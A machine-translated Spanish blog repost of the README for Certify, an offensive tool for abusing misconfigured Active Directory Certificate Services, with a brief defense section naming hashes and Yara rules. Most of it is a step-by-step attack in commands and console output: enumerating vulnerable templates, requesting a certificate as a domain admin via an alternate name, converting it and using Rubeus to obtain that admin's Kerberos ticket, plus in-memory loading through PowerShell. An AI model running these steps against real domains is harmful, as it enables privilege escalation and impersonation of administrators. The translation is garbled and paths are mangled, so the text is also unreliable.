Certificar: abuso de certificados de Active Directory

inHacker

byHelen Lafayetteoctubre 1, 2021, 11:30 am

[*]

Certify es una herramienta de C # para enumerar y abusar de configuraciones incorrectas en Active Directory Certificate Services (AD CS).

@ hurtj0y y @tifkin_ son los autores principales de Certify y la investigación relacionada con AD CS (blog y documento técnico).

propósito de uso

Certify.exe _____ _ _ __ / ____| | | (_)/ _| | | ___ _ __| |_ _| |_ _ _ | | / _ ‘__| __| | _| | | | | |___| __/ | | |_| | | | |_| | ________|_| __|_|_| __, | __/ | |___./ v1.0.0 Find information about all registered CAs: Certify.exe cas [/ca:SERVERca-name | /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local] [/hideAdmins] [/showAllPermissions] [/skipWebServiceChecks] [/quiet] Find all enabled certificate templates: Certify.exe find [/ca:SERVERca-name | /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local] [/quiet] Find vulnerable/abusable certificate templates using default low-privileged groups: Certify.exe find /vulnerable [/ca:SERVERca-name | /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local] [/quiet] Find vulnerable/abusable certificate templates using all groups the current user context is a part of: Certify.exe find /vulnerable /currentuser [/ca:SERVERca-name | /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local] [/quiet] Find enabled certificate templates where ENROLLEE_SUPPLIES_SUBJECT is enabled: Certify.exe find /enrolleeSuppliesSubject [/ca:SERVERca-name| /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local] [/quiet] Find enabled certificate templates capable of client authentication: Certify.exe find /clientauth [/ca:SERVERca-name | /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local] [/quiet] Find all enabled certificate templates, display all of their permissions, and don’t display the banner message: Certify.exe find /showAllPermissions /quiet [/ca:COMPUTERCA_NAME | /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local] Find all enabled certificate templates and output to a json file: Certify.exe find /json /outfile:C:Tempout.json [/ca:COMPUTERCA_NAME | /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local] Enumerate access control information for PKI objects: Certify.exe pkiobjects [/domain:domain.local] [/showAdmins] [/quiet] Request a new certificate using the current user context: Certify.exe request /ca:SERVERca-name [/subject:X] [/template:Y] [/install] Request a new certificate using the current machine context: Certify.exe request /ca:SERVERca-name /machine [/subject:X] [/template:Y] [/install] Request a new certificate using the current user context but for an alternate name (if supported): Certify.exe request /ca:SERVERca-name /template:Y /altname:USER Request a new certificate on behalf of another user, using an enrollment agent certificate: Certify.exe request /ca:SERVERca-name /template:Y /onbehalfof:DOMAINUSER /enrollcert:C:Tempenroll.pfx [/enrollcertpw:CERT_PASSWORD] Download an already requested certificate: Certify.exe download /ca:SERVERca-name /id:X [/install] [/machine] Certify completed in 00:00:00.0200190 «>

C:Tools>Certify.exe_____ _ _ __/ ____| | | (_)/ _|| | ___ _ __| |_ _| |_ _ _| | / _ '__| __| | _| | | || |___| __/ | | |_| | | | |_| |________|_| __|_|_| __, |__/ ||___./v1.0.0Find information about all registered CAs:Certify.exe cas [/ca:SERVERca-name | /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local] [/hideAdmins] [/showAllPermissions] [/skipWebServiceChecks] [/quiet]Find all enabled certificate templates:Certify.exe find [/ca:SERVERca-name | /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local] [/quiet]Find vulnerable/abusable certificate templates using default low-privileged groups:Certify.exe find /vulnerable [/ca:SERVERca-name | /domain:domain.local | /path:CN=Configuration,DC=domain,DC =local] [/quiet]Find vulnerable/abusable certificate templates using all groups the current user context is a part of:Certify.exe find /vulnerable /currentuser [/ca:SERVERca-name | /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local] [/quiet]Find enabled certificate templates where ENROLLEE_SUPPLIES_SUBJECT is enabled:Certify.exe find /enrolleeSuppliesSubject [/ca:SERVERca-name| /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local] [/quiet]Find enabled certificate templates capable of client authentication:Certify.exe find /clientauth [/ca:SERVERca-name | /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local] [/quiet]Find all enabled certificate templates, display all of their permissions, and don't display the banner message:Certify.exe find /showAllPermissions /quiet [/ca:COMPUTERCA_NAME | /domain:domain.local | /path:CN=Configuration,DC=d omain,DC=local]Find all enabled certificate templates and output to a json file:Certify.exe find /json /outfile:C:Tempout.json [/ca:COMPUTERCA_NAME | /domain:domain.local | /path:CN=Configuration,DC=domain,DC=local]Enumerate access control information for PKI objects:Certify.exe pkiobjects [/domain:domain.local] [/showAdmins] [/quiet]Request a new certificate using the current user context:Certify.exe request /ca:SERVERca-name [/subject:X] [/template:Y] [/install]Request a new certificate using the current machine context:Certify.exe request /ca:SERVERca-name /machine [/subject:X] [/template:Y] [/install]Request a new certificate using the current user context but for an alternate name (if supported):Certify.exe request /ca:SERVERca-name /template:Y /altname:USERRequest a new certificate on behalf of another user, using an enro llment agent certificate:Certify.exe request /ca:SERVERca-name /template:Y /onbehalfof:DOMAINUSER /enrollcert:C:Tempenroll.pfx [/enrollcertpw:CERT_PASSWORD]Download an already requested certificate:Certify.exe download /ca:SERVERca-name /id:X [/install] [/machine]Certify completed in 00:00:00.0200190

Utilizar certificados solicitados

Los certificados se pueden convertir a archivos .pfx que se pueden utilizar con Certify con:

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Los certificados se pueden utilizar con Rubeus para solicitar un TGT con:

«>

Rubeus.exe asktgt /user:X /certificate:C:Tempcert.pfx /password:<CERT_PASSWORD>

Tutorial

Primero, use Certify.exe para ver si hay plantillas vulnerables:

Certify.exe find /vulnerable _____ _ _ __ / ____| | | (_)/ _| | | ___ _ __| |_ _| |_ _ _ | | / _ ‘__| __| | _| | | | | |___| __/ | | |_| | | | |_| | ________|_| __|_|_| __, | __/ | |___./ v1.0.0 [*] Action: Find certificate templates [*] Using the search base ‘CN=Configuration,DC=theshire,DC=local’ [*] Restricting to CA name : dc.theshire.localtheshire-DC-CA [*] Listing info about the Enterprise CA ‘theshire-DC-CA’ Enterprise CA Name : theshire-DC-CA DNS Hostname : dc.theshire.local FullName : dc.theshire.localtheshire-DC-CA Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED Cert SubjectName : CN=theshire-DC-CA, DC=theshire, DC=local Cert Thumbprint : 187D81530E1ADBB6B8B9B961EAADC1F597E6D6A2 Cert Serial : 14BFC25F2B6EEDA94404D5A5B0F33E21 Cert Start Date : 1/4/2021 10:48:02 AM Cert End Date : 1/4/2026 10:58:02 AM Cert Chain : CN=theshire-DC-CA,DC=theshire,DC=local UserSpecifiedSAN : Disabled CA Permissions : Owner: BUILTINAdministrators S-1-5-32-544 Access Rights Principal Allow ManageCA, ManageCertificates BUILTINAdministrators S-1-5-32-544 Allow ManageCA, ManageCertificates THESHIREDomain Admins S-1-5-21-937929760-3187473010-80948926-512 Allow ManageCA, Read, Enroll THESHIREDomain Users S-1-5-21-937929760-3187473010-80948926-513 [!] Low-privileged principal has ManageCA rights! Allow Enroll THESHIREDomain Computers S-1-5-21-937929760-3187473010-80948926-515 Allow ManageCA, ManageCertificates THESHIREEnterprise Admins S-1-5-21-937929760-3187473010-80948926-519 Allow ManageCertificates, Enroll THESHIREcertmanager S-1-5-21-937929760-3187473010-80948926-1605 Allow ManageCA, Enroll THESHIREcertadmin S-1-5-21-937929760-3187473010-80948926-1606 Enrollment Agent Restrictions : Everyone S-1-1-0 Template : Targets : Everyone S-1-1-0 Everyone S-1-1-0 Template : User Targets : Everyone S-1-1-0 Vulnerable Certificates Templates : CA Name : dc.theshire.localtheshire-DC-CA Template Name : User2 Validity Period : 2 years Renewal Period : 6 weeks msPKI-Certificates-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PEND_ALL_REQUESTS, PUBLISH_TO_DS, AUTO_ENROLLMENT Authorized Signatures Required : 0 pkiextendedkeyusage : Client Authentication, Smart Card Logon Permissions Enrollment Permissions Enrollment Rights : THESHIREDomain Admins S-1-5-21-937929760-3187473010-80948926-512 THESHIREEnterprise Admins S-1-5-21-937929760-3187473010-80948926-519 All Extended Rights : THESHIREDomain Users S-1-5-21-937929760-3187473010-80948926-513 Object Control Permissions Owner : THESHIRElocaladmin S-1-5-21-937929760-3187473010-80948926-1000 Full Control Principals : THESHIREDomain Users S-1-5-21-937929760-3187473010-80948926-513 WriteOwner Principals : NT AUTHORITYAuthenticated UsersS-1-5-11 THESHIREDomain Admins S-1-5-21-937929760-3187473010-80948926-512 THESHIREDomain Users S-1-5-21-937929760-3187473010-80948926-513 THESHIREEnterprise Admins S-1-5-21-937929760-3187473010-80948926-519 WriteDacl Principals : NT AUTHORITYAuthenticated UsersS-1-5-11 THESHIREDomain Admins S-1-5-21-937929760-3187473010-80948926-512 THESHIREDomain Users S-1-5-21-937929760-3187473010-80948926-513 THESHIREEnterprise Admins S-1-5-21-937929760-3187473010-80948926-519 WriteProperty Principals : NT AUTHORITYAuthenticated UsersS-1-5-11 THESHIREDomain Admins S-1-5-21-937929760-3187473010-80948926-512 THESHIREDomain Users S-1-5-21-937929760-3187473010-80948926-513 THESHIREEnterprise Admins S-1-5-21-937929760-3187473010-80948926-519 CA Name : dc.theshire.localtheshire-DC-CA Template Name : VulnTemplate Validity Period : 3 years Renewal Period : 6 weeks msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS Authorized Signatures Required : 0 pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email Permissions Enrollment Permissions Enrollment Rights : THESHIREDomain Admins S-1-5-21-937929760-3187473010-80948926-512 THESHIREDomain Users S-1-5-21-937929760-3187473010-80948926-513 THESHIREEnterprise Admins S-1-5-21-937929760-3187473010-80948926-519 Object Control Permissions Owner : THESHIRElocaladmin S-1-5-21-937929760-3187473010-80948926-1000 WriteOwner Principals : THESHIREDomain Admins S-1-5-21-937929760-3187473010-80948926-512 THESHIREEnterprise Admins S-1-5-21-937929760-3187473010-80948926-519 THESHIRElocaladmin S-1-5-21-937929760-3187473010-80948926-1000 WriteDacl Principals : THESHIREDomain Admins S-1-5-21-937929760-3187473010-80948926-512 THESHIREEnterprise Admins S-1-5-21-937929760-3187473010-80948926-519 THESHIRElocaladmin S-1-5-21-937929760-3187473010-80948926-1000 WriteProperty Principals : THESHIREDomain Admins S-1-5-21-937929760-3187473010-80948926-512 THESHIREEnterprise Admins S-1-5-21-937929760-3187473010-80948926-519 THESHIRElocaladmin S-1-5-21-937929760-3187473010-80948926-1000 Certify completed in 00:00:00.6548319 «>

C:Temp>Certify.exe find /vulnerable_____ _ _ __/ ____| | | (_)/ _|| | ___ _ __| |_ _| |_ _ _| | / _ '__| __| | _| | | || |___| __/ | | |_| | | | |_| |________|_| __|_|_| __, |__/ ||___./v1.0.0[*] Action: Find certificate templates[*] Using the search base 'CN=Configuration,DC=theshire,DC=local'[*] Restricting to CA name : dc.theshire.localtheshire-DC-CA[*] Listing info about the Enterprise CA 'theshire-DC-CA'Enterprise CA Name : theshire-DC-CADNS Hostname : dc.theshire.localFullName : dc.theshire.localtheshire-DC-CAFlags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCEDCert SubjectName : CN=theshire-DC-CA, DC=theshire, DC=localCert Thumbpr int : 187D81530E1ADBB6B8B9B961EAADC1F597E6D6A2Cert Serial : 14BFC25F2B6EEDA94404D5A5B0F33E21Cert Start Date : 1/4/2021 10:48:02 AMCert End Date : 1/4/2026 10:58:02 AMCert Chain : CN=theshire-DC-CA,DC=theshire,DC=localUserSpecifiedSAN : DisabledCA Permissions :Owner: BUILTINAdministrators S-1-5-32-544Access Rights PrincipalAllow ManageCA, ManageCertificates BUILTINAdministrators S-1-5-32-544Allow ManageCA, ManageCertificates THESHIREDomain Admins S-1-5-21-937929760-3187473010-80948926-512Allow ManageCA, Read, Enroll THESHIREDomain Users S-1-5-21-937929760-3187473010-80948926-513[!] Low-privileged principal has ManageCA rights!Allow Enroll THESHIREDomain Computers S-1-5-21-937929760-3187473010-80948926-515Allow ManageCA, ManageCertificates THESHIREEnterprise Admins S-1-5-21-937929760-3187473010-80948926-519Allow ManageCertificates, Enroll THESHIREcertmanager S-1-5-21-937929760-3187473010-80948926-1605Allow ManageCA, Enroll THESHIREcertadmin S-1-5-21-937929760-3187473010-80948926-1606Enrollment Agent Restrictions :Everyone S-1-1-0Template : <All>Targets :Everyone S-1-1-0Everyone S-1-1-0Template : UserTargets :Everyone S-1-1-0Vulnerable Certificates Templates :CA Name : dc.theshire.localtheshire- DC-CATemplate Name : User2Validity Period : 2 yearsRenewal Period : 6 weeksmsPKI-Certificates-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATHmspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PEND_ALL_REQUESTS, PUBLISH_TO_DS, AUTO_ENROLLMENTAuthorized Signatures Required : 0pkiextendedkeyusage : Client Authentication, Smart Card LogonPermissionsEnrollment PermissionsEnrollment Rights : THESHIREDomain Admins S-1-5-21-937929760-3187473010-80948926-512THESHIREEnterprise Admins S-1-5-21-937929760-3187473010-80948926-519All Extended Rights : THESHIREDomain Users S-1-5-21-937929760-3187473010-80948926-513Object Control PermissionsOwner : THESHIRElocaladmin S-1-5-21-937929760-3187473010-80948926-1000Full Control Principals : THESHIREDomain Users S-1-5-21-937929760-3187473010-80948926-513WriteOwner Principals : NT AUTHORITYAuthenticated UsersS-1-5-11THESHIREDomain Admins S-1-5-21-937929760-3187473010-80948926-512THESHIREDomain Users S-1-5-21-937929760-3187473010-80948926-513THESHIREEnterprise Admins S-1-5-21-937929760-3187473010-80948926-519WriteDacl Principals : NT AUTHORITYAuthenticated UsersS-1-5-11THESHIREDomain Admins S-1-5-21-937929760-3187473010-80948926-512THESHIREDomain Users S-1-5-21-937929760-3187473010-80948926-513THESHIREEnterprise Admins S-1-5-21-937929 760-3187473010-80948926-519WriteProperty Principals : NT AUTHORITYAuthenticated UsersS-1-5-11THESHIREDomain Admins S-1-5-21-937929760-3187473010-80948926-512THESHIREDomain Users S-1-5-21-937929760-3187473010-80948926-513THESHIREEnterprise Admins S-1-5-21-937929760-3187473010-80948926-519CA Name : dc.theshire.localtheshire-DC-CATemplate Name : VulnTemplateValidity Period : 3 yearsRenewal Period : 6 weeksmsPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECTmspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DSAuthorized Signatures Required : 0pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure EmailPermissionsEnrollment PermissionsEnrollment Rights : THESHIREDomain Admins S-1-5-21-937929760-3187473010-80948926-512THESHIREDomain Users S-1-5-21-937929760-3187473010-80948926-513THESHIREEnterprise Admins S-1-5-21-937929760-3187473010-80948926-519Object Control PermissionsOwner : THESHIRElocaladmin S-1-5-21-937929760-3187473010-80948926-1000WriteOwner Principals : THESHIREDomain Admins S-1-5-21-937929760-3187473010-80948926-512THESHIREEnterprise Admins S-1-5-21-937929760-3187473010-80948926-519THESHIRElocaladmin S-1-5-21-937929760-3187473010-80948926-1000WriteDacl Principals : THESHIREDomain Admins S-1-5-21-937929760-3187473010-8094 8926-512THESHIREEnterprise Admins S-1-5-21-937929760-3187473010-80948926-519THESHIRElocaladmin S-1-5-21-937929760-3187473010-80948926-1000WriteProperty Principals : THESHIREDomain Admins S-1-5-21-937929760-3187473010-80948926-512THESHIREEnterprise Admins S-1-5-21-937929760-3187473010-80948926-519THESHIRElocaladmin S-1-5-21-937929760-3187473010-80948926-1000Certify completed in 00:00:00.6548319

Dados los resultados anteriores, tenemos los siguientes tres problemas:

  1. THESHIREDomain Users tengo ManageCA Permisos a través del dc.theshire.localtheshire-DC-CA CA (ESC7)Esto significa que cualquier persona de la CA puede cambiar el indicador EDITF_ATTRIBUTESUBJECTALTNAME2.
  2. THESHIREDomain Users control total de la Usuario2 Plantilla (ESC4)Eso significa que cualquiera puede cambiar eso CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT Seleccione esta plantilla y elimine el PEND_ALL_REQUESTS Requisito de emisión.
  3. THESHIREDomain Users puede inscribirse en el Plantilla Vuln Plantilla que se puede usar para la autenticación del cliente y que tiene ENROLLEE_SUPPLIES_SUBJECT establecido (ESC1)Esto significa que cualquiera puede suscribirse a esta plantilla e ingresar cualquier nombre de solicitante alternativo (por ejemplo, como DA).

Mostramos el abuso del escenario 3.

A continuación, solicitamos un nuevo certificado para esta plantilla / CA y proporcionamos un DA localadmin como subdirector:

Certify.exe request /ca:dc.theshire.localtheshire-DC-CA /template:VulnTemplate /altname:localadmin _____ _ _ __ / ____| | | (_)/ _| | | ___ _ __| |_ _| |_ _ _ | | / _ ‘__| __| | _| | | | | |___| __/ | | |_| | | | |_| | ________|_| __|_|_| __, | __/ | |___./ v1.0.0 [*] Action: Request a Certificates [*] Current user context : THESHIREharmj0y [*] No subject name specified, using current context as subject. [*] Template : VulnTemplate [*] Subject : CN=harmj0y, OU=TestOU, DC=theshire, DC=local [*] AltName : localadmin [*] Certificate Authority : dc.theshire.localtheshire-DC-CA [*] CA Response : The certificate had been issued. [*] Request ID : 337 [*] cert.pem : —–BEGIN RSA PRIVATE KEY—– MIIEpAIBAAKCAQEAn8bKuwCYj8… —–END RSA PRIVATE KEY—– —–BEGIN CERTIFICATE—– MIIGITCCBQmgAwIBAgITVQAAAV… —–END CERTIFICATE—– [*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP «Microsoft Enhanced Cryptographic Provider v1.0» -export -out cert.pfx Certify completed in 00:00:04.2127911 «>

C:Temp>Certify.exe request /ca:dc.theshire.localtheshire-DC-CA /template:VulnTemplate /altname:localadmin_____ _ _ __/ ____| | | (_)/ _|| | ___ _ __| |_ _| |_ _ _| | / _ '__| __| | _| | | || |___| __/ | | |_| | | | |_| |________|_| __|_|_| __, |__/ ||___./v1.0.0[*] Action: Request a Certificates[*] Current user context : THESHIREharmj0y[*] No subject name specified, using current context as subject.[*] Template : VulnTemplate[*] Subject : CN=harmj0y, OU=TestOU, DC=theshire, DC=local[*] AltName : localadmin[*] Certificate Authority : dc.theshire.localtheshire-DC-CA[*] CA Response : The certificate had been issued.[*] Request ID : 337[*] cert.pem : -----BEGIN RSA PRIVATE KEY-----MIIEpAIBAAKCAQEAn8bKuwCYj8...-----END RSA PRIVATE KEY----------BEGIN CERTIFICATE-----MIIGITCCBQmgAwIBAgITVQAAAV...-----END CERTIFICATE-----[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfxCertify completed in 00:00:04.2127911

Entendido —–BEGIN RSA PRIVATE KEY—– … —–END CERTIFICATE—– Sección a un archivo en Linux / macOS y ejecute el comando openssl para convertirlo en un archivo .pfx. No ingrese una contraseña cuando se le solicite:

(base) laptop:~ harmj0y$ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfxEnter Export Password:Verifying - Enter Export Password:(base) laptop:~ harmj0y$

Finalmente, mueva cert.pfx al sistema de archivos de su computadora de destino (manualmente o mediante Cobalt Strike) y solicite un TGT para el. a altname Usuario que usa Rubeus:

Rubeus.exe asktgt /user:localadmin /certificate:C:Tempcert.pfx ______ _ (_____ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ | ___ | | | |/___) | | | |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v1.6.1 [*] Action: Ask TGT [*] Using PKINIT with etype rc4_hmac and subject: CN=harmj0y, OU=TestOU, DC=theshire, DC=local [*] Building AS-REQ (w/ PKINIT preauth) for: ‘theshire.locallocaladmin’ [+] TGT request successful! [*] base64(ticket.kirbi): doIFujCCBbagAwIBBaEDAgEWooIExzCC…(snip)… ServiceName : krbtgt/theshire.local ServiceRealm : THESHIRE.LOCAL UserName : localadmin UserRealm : THESHIRE.LOCAL StartTime : 2/22/2021 2:06:51 PM EndTime : 2/22/2021 3:06:51 PM RenewTill : 3/1/2021 2:06:51 PM Flags : name_canonicalize, pre_authent, initial, renewable, forwardable KeyType : rc4_hmac Base64(key) : Etb5WPFWeMbsZr2+FQQQMw== «>

C:Temp>Rubeus.exe asktgt /user:localadmin /certificate:C:Tempcert.pfx______ _(_____ | |_____) )_ _| |__ _____ _ _ ___| __ /| | | | _ | ___ | | | |/___)| | | |_| | |_) ) ____| |_| |___ ||_| |_|____/|____/|_____)____/(___/v1.6.1[*] Action: Ask TGT[*] Using PKINIT with etype rc4_hmac and subject: CN=harmj0y, OU=TestOU, DC=theshire, DC=local[*] Building AS-REQ (w/ PKINIT preauth) for: 'theshire.locallocaladmin'[+] TGT request successful![*] base64(ticket.kirbi):doIFujCCBbagAwIBBaEDAgEWooIExzCC...(snip)...ServiceName : krbtgt/theshire.localServiceRealm : THESHIRE.LOCALUserName : localadminUserRealm : THESHIRE.LOCALStartTime : 2/22/2021 2:06:51 PMEndTime : 2/22/2021 3:06:51 PMRenewTill : 3/ 1/2021 2:06:51 PMFlags : name_canonicalize, pre_authent, initial, renewable, forwardableKeyType : rc4_hmacBase64(key) : Etb5WPFWeMbsZr2+FQQQMw==

Consideraciones de defensa

Certify se lanzó con el nuestro en Black Hat 2021 Conferencia «Bienes de segunda mano certificados: abuso de los servicios de certificados de Active Directory».

El TypeRefHash del código base actual de Certify es f9dbbfe2527e1164319350c0b0900c58be57a46c53ffef31699ed116a765995a.

El GUID TypeLib de Certify es 64524ca5-e4d0-41b3-acc3-3bdbefd40c97. Esto se refleja en las reglas de Yara incluidas actualmente en este repositorio.

Consulte nuestro documento técnico para obtener orientación sobre prevención y detección.

Compilar instrucciones

No planeamos lanzar binarios para Certify, por lo que deberá compilarlo usted mismo 🙂

Certify fue desarrollado para .NET 4.0 y es compatible con Visual Studio 2019 Community Edition. Simplemente abra el archivo .sln del proyecto, seleccione «Liberar» y compile.

Nota al margen: ejecutar Certify a través de PowerShell

Si desea ejecutar Certify en la memoria a través de un contenedor de PowerShell, primero compile Certify y codifique el ensamblado resultante en base64:

[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:TempCertify.exe")) | Out-File -Encoding ASCII C:TempCertify.txt

Luego, Certify se puede cargar en un script de PowerShell de la siguiente manera (reemplazando «aa …» con la cadena de ensamblaje Certify codificada en base64):

$CertifyAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String("aa..."))

El método Main () y cualquier argumento se pueden llamar de la siguiente manera:

[Certify.Program]::Main("find /vulnerable".Split())

Nota al margen Nota al margen: Ejecución de Certify a través de PSRemoting

Debido a la forma en que PSRemoting maneja la salida, necesitamos redirigir stdout a una cadena y devolverla en su lugar. Afortunadamente, Certify tiene una función que ayuda con esto.

Si sigue las instrucciones en Nota al margen: Ejecución de Certify Through PowerShell para crear un Certify.ps1, agregue el script algo como esto:

[Certify.Program]::MainString("find /vulnerable")

Luego, debería poder ejecutar Certify a través de PSRemoting con algo como lo siguiente:

$s = New-PSSession dc.theshire.localInvoke-Command -Session $s -FilePath C:TempCertify.ps1

Alternativamente, puede utilizar Certify’s /outfile:C:FILE.txt -Argumento redirige todos los flujos de salida al archivo especificado.

reflexiones

En lo que respecta a la divulgación pública, hemos auto-embargado la publicación de nuestras herramientas ofensivas (Certify y ForgeCert) durante ~ 45 días después de la publicación de nuestro documento técnico para brindar a las empresas la oportunidad de controlar los problemas que rodean a Active. Servicios de certificados de directorio. También publicamos de forma preventiva algunas reglas / IOC de Yara para ambos proyectos y publicamos el proyecto PSPKIAudit PowerShell orientado a la defensa junto con el documento técnico. Sin embargo, hemos descubierto que en el pasado, las empresas y los proveedores a menudo no solucionaban los problemas o creaban detecciones para ataques «teóricos» hasta que alguien con una prueba de concepto demuestra que algo es posible.

acción de gracias

Certify ha utilizado algunos recursos en línea como referencia e inspiración:

El trabajo de AD CS se basó en el trabajo de varios otros. El documento técnico tiene una cobertura completa, pero para resumirlo:

[*]

abusoActivecertificadosCertificarDirectory

Índice de contenido

Newsletter

What do you think?

0 Points Upvote Downvote

You May Also Like

  • byHelen Lafayetteoctubre 26, 2021, 8:30 pm
  • byHelen Lafayetteoctubre 26, 2021, 2:17 pm
  • byHelen Lafayetteoctubre 26, 2021, 1:41 pm
  • Trending byHelen Lafayetteoctubre 26, 2021, 2:10 am
  • byHelen Lafayetteoctubre 25, 2021, 2:50 pm
  • byHelen Lafayetteoctubre 25, 2021, 11:30 am

Reply with GIF

GIPHY App Key not set. Please check settings

    Don’t Miss

    • Hot Popular byHelen Lafayetteoctubre 8, 2021, 1:41 pm
    • Hot Popular byHelen Lafayetteoctubre 13, 2021, 1:06 pm
    • Hot Popular byAlan Kimoctubre 15, 2021, 10:26 pm
    • Hot Popular byAlan Kimoctubre 6, 2021, 1:13 pm
    • Hot Popular byHelen Lafayetteoctubre 10, 2021, 11:30 am
    • Hot Popular byHelen Lafayetteoctubre 13, 2021, 12:53 pm

    ¡Octubre es el mes de la concientización sobre la seguridad cibernética! Por qué es importante ser cibernético

    Los piratas informáticos chinos utilizaron un nuevo rootkit para espiar a los usuarios específicos de Windows 10

    Entradas relacionadas: